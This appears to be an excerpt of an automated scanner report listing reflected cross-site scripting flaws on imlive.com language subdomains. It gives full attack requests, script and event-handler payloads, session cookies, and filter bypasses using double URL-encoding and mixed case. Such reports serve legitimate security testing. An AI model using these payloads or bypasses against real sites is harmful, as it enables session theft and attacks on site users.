The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e12af"><script>alert(1)</script>f4d60ab8f81 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee4f7"><script>alert(1)</script>0f4356d3bc3 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d was submitted in the gotopage parameter. This input was echoed as db58b'onerror='alert(1)'44c9eed88d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSTRTBSD=CEBIMIMAOCCIFKMLDLMBDPAK; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:08 GMT Connection: close Content-Length: 8303 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f5f"><script>alert(1)</script>74d0037b57 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.27. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dk.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31330"><script>alert(1)</script>1979371c19a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?31330"><script>alert(1)</script>1979371c19a=1 HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||31330"><script>alert(1)</script>1979371c19a~1');return false;"> ...[SNIP]...
2.28. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dk.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669d4'-alert(1)-'409ace51e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?669d4'-alert(1)-'409ace51e58=1 HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39b96"><script>alert(1)</script>aa918e4b7e3 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d099c"><script>alert(1)</script>1462ebc3ff2 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 was submitted in the gotopage parameter. This input was echoed as 2babb'style='x:expression(alert(1))'730ccb26132 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: idk=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQSTSCRD=JCBCPJMAPKIPKJHFCJIAJBAC; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:16 GMT Connection: close Content-Length: 8330 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c286"><script>alert(1)</script>f1e7aab618f was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.33. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://es.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f845"><script>alert(1)</script>2a1f57da1a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8f845"><script>alert(1)</script>2a1f57da1a5=1 HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||8f845"><script>alert(1)</script>2a1f57da1a5~1');return false;"> ...[SNIP]...
2.34. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://es.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ff3'-alert(1)-'a75b4d32011 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?86ff3'-alert(1)-'a75b4d32011=1 HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52d7"><script>alert(1)</script>569b58da610 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd0ed"><script>alert(1)</script>3940b74ef04 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25492'onerror%3d'alert(1)'4929c58198 was submitted in the gotopage parameter. This input was echoed as 25492'onerror='alert(1)'4929c58198 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/25492'onerror%3d'alert(1)'4929c58198 HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSRTQCRC=GFLJMIMAIHNDHDFGKCOMPNDP; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:17 GMT Connection: close Content-Length: 8313 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb36"><script>alert(1)</script>678c2c2a5a9 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.39. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fr.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b566'-alert(1)-'c7449b1e1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4b566'-alert(1)-'c7449b1e1ba=1 HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=fr.imlive.com&ul=/?4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&iy=dallas&id=44&iu=1&vd=a1d85813-857c-4f7f-9b93-2ebdcfdaba8e';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.40. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fr.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647=1 HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17fa1'onerror%3d'alert(1)'4373c72317b was submitted in the gotopage parameter. This input was echoed as 17fa1'onerror='alert(1)'4373c72317b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/17fa1'onerror%3d'alert(1)'4373c72317b HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:22 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQRCSC=BMMFJIMAJCKNADIOHDLHHPAA; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:22 GMT Connection: close Content-Length: 8315 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.42. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gr.imlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ff7"><script>alert(1)</script>e0815795bf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?84ff7"><script>alert(1)</script>e0815795bf3=1 HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
